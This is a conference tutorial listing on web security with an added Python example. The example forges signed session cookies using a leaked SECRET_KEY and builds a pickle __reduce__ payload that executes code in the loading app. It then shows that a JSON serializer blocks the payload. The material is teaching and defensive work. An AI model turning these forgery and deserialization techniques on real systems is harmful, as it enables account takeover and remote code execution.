
Thursday 9 a.m.–12:20 p.m.

Getting comfortable with web security: A hands-on session

Asheesh Laroia, Jacky Chang, Nicole Zuckerman

Audience level:


Web application security can be an intimidating discipline, yet it is of supreme importance to the people who use the things we build. In this tutorial, you'll learn about essential topics in web security, and you will gain hands-on practice identifying and exploiting vulnerabilities in a Python-based web app. For each issue, we will cover how to write code that avoids it.


After attending this tutorial, attendees will gain general knowledge, being able to:

* Explain the difference between cross-site scripting and cross-site request forgery, and understand at least one way to abuse each.
* Describe the use of cookies in web applications and how they relate to security.
* Identify authorization bugs in web applications, and name programming patterns that avoid authorization bugs.
* Understand how to think like an attacker, by practicing being one.

They will be able to perform and explain specific attacks as well, such as:

* Taking advantage of subdomains to steal cookies, and using a stolen cookie to impersonate another user.
* Abusing file uploads to defeat security protections within a web app.
* Abusing a Django SECRET_KEY to steal a fellow user's account.
* Leveraging the "pickle" module to run chosen code in the context of someone else's web app.

Attendees will leave the tutorial with an appreciation of the importance of security and practical experience that enables further study.
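The two Python-specific attacks named above (forging a session with a leaked SECRET_KEY, and running code through pickle) share one root: a signed cookie is only as trustworthy as the key, and a pickled cookie is dangerous even when the signature is valid. The following is an added example written for this page, not code from the tutorial or from Django. The signing scheme, the SECRET_KEY value, the user IDs and the payload text are all constructed for illustration; the shape (base64 payload, HMAC, serializer behind the signature) is typical of signed-cookie sessions but is not any framework's actual implementation.

```python
"""Added example: what a leaked SECRET_KEY buys an attacker, and why a pickle
session serializer turns that into code execution. Toy scheme, not Django's."""
import base64
import hashlib
import hmac
import json
import pickle

# Constructed secret. The attack premise is that the attacker already has it
# (committed to a repo, shown on a debug page, baked into a public image, ...).
SECRET_KEY = "constructed-example-key-do-not-reuse"


def sign(payload: bytes, key: str) -> str:
    """Return base64(payload):hmac, the usual shape of a signed session cookie."""
    mac = hmac.new(key.encode(), payload, hashlib.sha256).hexdigest()
    return base64.urlsafe_b64encode(payload).decode() + ":" + mac


def verify(token: str, key: str) -> bytes:
    """Check the MAC in constant time and return the raw payload, or raise."""
    payload_b64, mac = token.rsplit(":", 1)
    payload = base64.urlsafe_b64decode(payload_b64)
    expected = hmac.new(key.encode(), payload, hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("session cookie has a bad signature")
    return payload


# --- Attack 1: account takeover with a leaked key (any serializer) ---------
def load_session_json(token: str, key: str) -> dict:
    return json.loads(verify(token, key))


def forge_json_session(leaked_key: str, victim_user_id: int) -> str:
    """Mint a cookie the server will accept as the victim (constructed user id)."""
    return sign(json.dumps({"user_id": victim_user_id}).encode(), leaked_key)


def signature_check_rejects_wrong_key() -> bool:
    """Without the real key the MAC fails, so the key is the whole defence."""
    try:
        load_session_json(forge_json_session("guessed-key", 1), SECRET_KEY)
    except ValueError:
        return True
    return False


# --- Attack 2: code execution when the session payload is a pickle ----------
def load_session_pickle(token: str, key: str):
    # The signature check passes (the key leaked), then pickle.loads calls
    # whatever callable the payload's __reduce__ names.
    return pickle.loads(verify(token, key))


class PickleRCE:
    """Object whose __reduce__ makes the unpickler call eval() on attacker text.
    A real payload would name os.system or subprocess.Popen; eval is used here
    so the effect is visible as a return value instead of a side effect."""

    def __reduce__(self):
        return (eval, ("'attacker code ran in the web app, pid %d' "
                       "% __import__('os').getpid()",))


def forge_pickle_session(leaked_key: str) -> str:
    return sign(pickle.dumps(PickleRCE()), leaked_key)


# --- Defence: a JSON loader cannot execute the pickle payload ----------------
def json_loader_rejects_pickle(token: str, key: str) -> bool:
    """True when the JSON serializer refuses the forged pickle cookie.
    json.JSONDecodeError and UnicodeDecodeError are both ValueError subclasses."""
    try:
        load_session_json(token, key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    admin_cookie = forge_json_session(SECRET_KEY, victim_user_id=1)
    print("server sees:", load_session_json(admin_cookie, SECRET_KEY))
    rce_cookie = forge_pickle_session(SECRET_KEY)
    print("pickle loader:", load_session_pickle(rce_cookie, SECRET_KEY))
    print("json loader rejects it:", json_loader_rejects_pickle(rce_cookie, SECRET_KEY))
```

The JSON serializer closes the code-execution path but not the impersonation one: once the key has leaked, every session it ever signed can be forged, so the only fix is to rotate the key (invalidating all sessions) and keep it out of source control and debug output.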

Student Handout

No handouts have been provided yet for this tutorial
